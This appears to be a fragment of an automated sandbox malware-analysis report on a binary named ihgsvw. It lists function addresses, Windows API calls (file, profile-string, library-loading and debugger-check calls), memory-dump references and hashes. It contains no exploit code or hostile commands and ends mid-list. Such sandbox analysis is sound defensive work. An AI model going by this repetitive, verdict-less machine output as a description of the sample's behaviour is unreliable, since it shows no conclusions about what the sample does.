                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 878051aa5130558d08bfab24e083824f969f8be2e1223442a6ecfe3c8408d04a
                • Instruction ID: c9eac8a3098e98aed62a29a1842a71ef6c11ac8c4408179f1672a332fea7e5c8
                • Opcode Fuzzy Hash: 878051aa5130558d08bfab24e083824f969f8be2e1223442a6ecfe3c8408d04a
                • Instruction Fuzzy Hash: A532C030A00209DBDB24EF68C891BFEB7F4EF05310F548999F955AB2A2D771AD49CB41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3A1C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                Download Yara Rule
                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 00BE4115
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                  • Part of subcall function 00BA39DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA39FD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Name$Path$FileFullLongOpen
                • String ID: X
                • API String ID: 779396738-3081909835
                • Opcode ID: 4e55876ecdd385e78fc83673b909dde783aee179465f428cd2f63c06452ce72a
                • Instruction ID: 96c6f0e6eaa5c1853bde40d2877e5995c0795978527b2e794c830110da03967f
                • Opcode Fuzzy Hash: 4e55876ecdd385e78fc83673b909dde783aee179465f428cd2f63c06452ce72a
                • Instruction Fuzzy Hash: 8521C3B1A042989BCF11DF94C845BEE7BFC9F49714F004099E505A7241DBF49A898FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C195F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C19665
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C19673
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: PrivateProfileStringWrite$FullNamePath
                • String ID:
                • API String ID: 3876400906-0
                • Opcode ID: b0406ced03da9f92a4e86cea1210feaf91f080124eec379d3c40b0058e5ed3ac
                • Instruction ID: c0916d49be74b0be9ef43761915fb1ffa154947e4490c3a7421b137544996233
                • Opcode Fuzzy Hash: b0406ced03da9f92a4e86cea1210feaf91f080124eec379d3c40b0058e5ed3ac
                • Instruction Fuzzy Hash: B0111979A00625AFCB10EB65C850D6EB7F5FF49360B058894E856AB762CB30FD41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA6E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BA6E80
                • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BE59A2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 8276e940dc7195318856584b49c74205dbec2fa5de6a101ead942a7051b1e17b
                • Instruction ID: fdf40bc24359c0f41eb5ef9440e8e320f02584a6a880f58822423a36768e44ef
                • Opcode Fuzzy Hash: 8276e940dc7195318856584b49c74205dbec2fa5de6a101ead942a7051b1e17b
                • Instruction Fuzzy Hash: EF01B531149261B6E7300A26CC0EF9B7FD8EF03774F148350BE996A1E0C7B45855CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA32A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • IsThemeActive.UXTHEME ref: 00BA32C4
                  • Part of subcall function 00BA326D: SystemParametersInfoW.USER32 ref: 00BA3282
                  • Part of subcall function 00BA326D: SystemParametersInfoW.USER32 ref: 00BA3299
                  • Part of subcall function 00BA3312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BA32EF,?), ref: 00BA3342
                  • Part of subcall function 00BA3312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BA32EF,?), ref: 00BA3355
                  • Part of subcall function 00BA3312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C72418,00C72400,?,?,?,?,?,?,00BA32EF,?), ref: 00BA33C1
                  • Part of subcall function 00BA3312: SetCurrentDirectoryW.KERNEL32(?,00000001,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA3442
                • SystemParametersInfoW.USER32 ref: 00BA32FE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                • String ID:
                • API String ID: 1550534281-0
                • Opcode ID: ab47d9db7eb46c63a8e82b2c82500bf7cbf5db12291f81f243e8316ba48d440c
                • Instruction ID: 67a216c0a5697018e4c5a4dd015aca70fd67df37163e285c2ecc4872f310e0d5
                • Opcode Fuzzy Hash: ab47d9db7eb46c63a8e82b2c82500bf7cbf5db12291f81f243e8316ba48d440c
                • Instruction Fuzzy Hash: D2F03A71558344AFE700AF70FC0AB6C3BD8E705B05F144855B50D8A0F2DBB995D19B14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BBF95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                Download Yara Rule
                APIs
                • timeGetTime.WINMM ref: 00BBF97A
                  • Part of subcall function 00BAEDE0: GetInputState.USER32 ref: 00BAEEB7
                • Sleep.KERNEL32(00000000), ref: 00BFFAC2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: InputSleepStateTimetime
                • String ID:
                • API String ID: 4149333218-0
                • Opcode ID: 2edd2a9beebc889b194de519d7b9958015d60bcfbb2e0af0174a56a9eb81e24a
                • Instruction ID: f6e94d034df75e2f92cc7c989e1c7f2dee1a4ff6be30db1e4d0f9c13afbf746f
                • Opcode Fuzzy Hash: 2edd2a9beebc889b194de519d7b9958015d60bcfbb2e0af0174a56a9eb81e24a
                • Instruction Fuzzy Hash: 47F082712446059FC310EF65D445B6ABBE5FF45360F00406AF45EC7360DB70A810CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA8774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00BAAE65,?,?,?), ref: 00BA8793
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00BAAE65,?,?,?), ref: 00BA87C9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharMultiWide
                • String ID:
                • API String ID: 626452242-0
                • Opcode ID: 607abfeca982fbf90e2f70e7a641a5185155e98755dcbc7c14f27342da6e9469
                • Instruction ID: 1c776265cc6301ee6e415f67507804393f1d33595d52f7eee34e5f54d3e46286
                • Opcode Fuzzy Hash: 607abfeca982fbf90e2f70e7a641a5185155e98755dcbc7c14f27342da6e9469
                • Instruction Fuzzy Hash: AE01DF71314204BFEB18AB699C4BF7F7AEDDF85350F1400AEB102DA191EEA0AC009624
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BACA50 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                Download Yara Rule
                APIs
                • __Init_thread_footer.LIBCMT ref: 00BACE8E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                • Opcode ID: 163b57547ea20c17ccc3cb99aa4c499bde75bad57c84fe9ee9b70838c949f567
                • Instruction ID: 658fd8bafbacb21eaeeaf4dcad8af31db128e2e08a5d4f72b081b715ef139e6d
                • Opcode Fuzzy Hash: 163b57547ea20c17ccc3cb99aa4c499bde75bad57c84fe9ee9b70838c949f567
                • Instruction Fuzzy Hash: 1B32B074A08209EFDB20CF58C885BBABBF5EF45310F148899E919AB261D771ED45CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BAB4B0 Relevance: 1.9, APIs: 1, Instructions: 432COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a962bb7cfaca2ce5a3d92bc11d889f69a4744497b43b9d5e40766cf27ada5e2
                • Instruction ID: 210e41162bab7c24377698e1f8ec4ee5abe57823bfe2486f3f6808da262d840e
                • Opcode Fuzzy Hash: 9a962bb7cfaca2ce5a3d92bc11d889f69a4744497b43b9d5e40766cf27ada5e2
                • Instruction Fuzzy Hash: 67F1E271D182199BCF14EF98C890EFEB7F5FF46300F5045AAE922A7292EB349941CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BCF126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a4fabd0ef1fade04a56c92cbd0e569592619c11b21ed7afdf036590a129de17
                • Instruction ID: dbd412c2bf2493a7b276498d135c406399745212b66208857c86afaa317e5c18
                • Opcode Fuzzy Hash: 8a4fabd0ef1fade04a56c92cbd0e569592619c11b21ed7afdf036590a129de17
                • Instruction Fuzzy Hash: 7C517E75A00149AFDB10DFA8C841FB97BE6EB85364F1981EDF8099B391C771AD42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0FBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                Download Yara Rule
                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00C0FBE3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: BuffCharLower
                • String ID:
                • API String ID: 2358735015-0
                • Opcode ID: 34ef20bdca580b2caa0d75dcef5b2e1ff56a482d00830c80829ee7b2ceec1bc1
                • Instruction ID: f1c40d5d8a5aa7a74ec9d7e12c4ef26f0222fff8ace4123b9ee77ea3e75c1827
                • Opcode Fuzzy Hash: 34ef20bdca580b2caa0d75dcef5b2e1ff56a482d00830c80829ee7b2ceec1bc1
                • Instruction Fuzzy Hash: 9641A4B2500309AFDB35EF64C8819AEB7F8EF44310B15457EE91697681EB70DA85CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC0000 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 9a428ffb34d7c00601bfe8f45684e9b67446f986b65840c41d7a2b95deeeb8fb
                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: 3431C370A10109DBC718EF58C480B69F7E6FB59300B6586E9E40ACB256D732EDC1DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C18E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • GetPrivateProfileStringW.KERNEL32 ref: 00C18EBE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FullNamePathPrivateProfileString
                • String ID:
                • API String ID: 1991638491-0
                • Opcode ID: df930594305b16372214beae6ac4f65b815676fe1335746fe7c303574d98a75d
                • Instruction ID: 20eeb4bc0892ba3fbc5d86e600e2b3cb3a334cef238bdc979f087d65624ce734
                • Opcode Fuzzy Hash: df930594305b16372214beae6ac4f65b815676fe1335746fe7c303574d98a75d
                • Instruction Fuzzy Hash: 6E211D79A04605EFCB10EB64C942DAEBBF5EF4A360B044094F9466B3A2DB30BD55CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA6332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA633E
                  • Part of subcall function 00BA6332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA6350
                  • Part of subcall function 00BA6332: FreeLibrary.KERNEL32(00000000,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6362
                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA639F
                  • Part of subcall function 00BA62FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6304
                  • Part of subcall function 00BA62FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA6316
                  • Part of subcall function 00BA62FB: FreeLibrary.KERNEL32(00000000,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6329
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Library$Load$AddressFreeProc
                • String ID:
                • API String ID: 2632591731-0
                • Opcode ID: 5096f384ab3fa8f2575f98fe76647469788a3505a4b75e2284127ece66234dfb
                • Instruction ID: e403b7075bcab20790f40e14132d957ed65290d13dfc4d5ff1e87171b1859fad
                • Opcode Fuzzy Hash: 5096f384ab3fa8f2575f98fe76647469788a3505a4b75e2284127ece66234dfb
                • Instruction Fuzzy Hash: 931123B2604204ABDF24BB24C802BAD77E1AF52715F2488ADF483A61C1EEB49E469750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD8792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: __wsopen_s
                • String ID:
                • API String ID: 3347428461-0
                • Opcode ID: c7615e81d8abf7178a06244db437c91b1a7a82f92138601c79544b0aff5c699d
                • Instruction ID: ad8c9da69dd6b74438b76f5479e3bf076028e72791ef688a9abcaf3864604ced
                • Opcode Fuzzy Hash: c7615e81d8abf7178a06244db437c91b1a7a82f92138601c79544b0aff5c699d
                • Instruction Fuzzy Hash: 95112E7590410AAFCF16DF58E941A9E7BF5EF48310F1040AAFC09AB311EA31EE11CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BAB050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                Download Yara Rule
                APIs
                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BA6B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00BAB0AC
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
